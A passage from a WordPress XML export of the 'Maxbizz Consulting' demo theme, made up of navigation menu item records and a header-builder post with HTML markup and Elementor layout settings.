		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[977]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1335/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1335/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1335</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1335]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>20</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[959]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1336/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1336/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1336</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1336]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>19</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[898]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services-2/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/our-services-2/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1337</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>5</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[885]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/services/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/services/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1338</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>18</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1339/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1339/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1339</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1339]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>16</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1340]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[861]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/portfolio/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1340</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>13</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-1/</link>
		<pubDate>Fri, 17 Jul 2020 08:34:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=7</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
			<a href="#" role="button">
						FREE QUOTE
					</a>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>7</wp:post_id>
		<wp:post_date><![CDATA[2020-07-17 08:34:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-17 08:34:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8d39a3f","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"13","right":"0","bottom":"13","left":"0","isLinked":false}},"elements":[{"id":"88d13f7","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"fd8c778","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"f0b1296","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"bbce169","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"dfefc95","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"481a8d7","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_weight":"600","button_text_color":"#1B1D21","background_color":"rgba(255, 143, 62, 0.19)","hover_color":"#FFFFFF","button_background_hover_color":"#FF8F3E","border_border":"solid","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"#FF8F3E","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"text_padding":{"unit":"px","top":"16","right":"29","bottom":"16","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"58","isLinked":false},"typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"a79077e","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#272933","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"3c16631","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"471e1f7","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#FE8423","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""}},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"c60b06b","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"1ca8a66","elType":"widget","settings":{"icon_color":"#FFFFFF"},"elements":[],"widgetType":"icart"},{"id":"a1e6544","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isearch"},{"id":"f2c8f30","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:17:"_ot_content_align";i:2;s:5:"align";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:2;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:2;s:16:"description_text";i:2;s:8:"position";i:2;s:10:"title_size";i:2;s:13:"selected_icon";i:2;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:2;s:9:"icon_size";i:2;s:6:"rotate";i:2;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:2;s:18:"title_bottom_space";i:2;s:27:"title_typography_typography";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;s:33:"description_typography_typography";i:2;s:32:"description_typography_font_size";i:2;s:34:"description_typography_font_weight";i:2;s:11:"title_color";i:2;s:28:"title_typography_font_family";i:2;s:17:"description_color";i:2;s:34:"description_typography_font_family";i:2;s:28:"title_typography_line_height";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s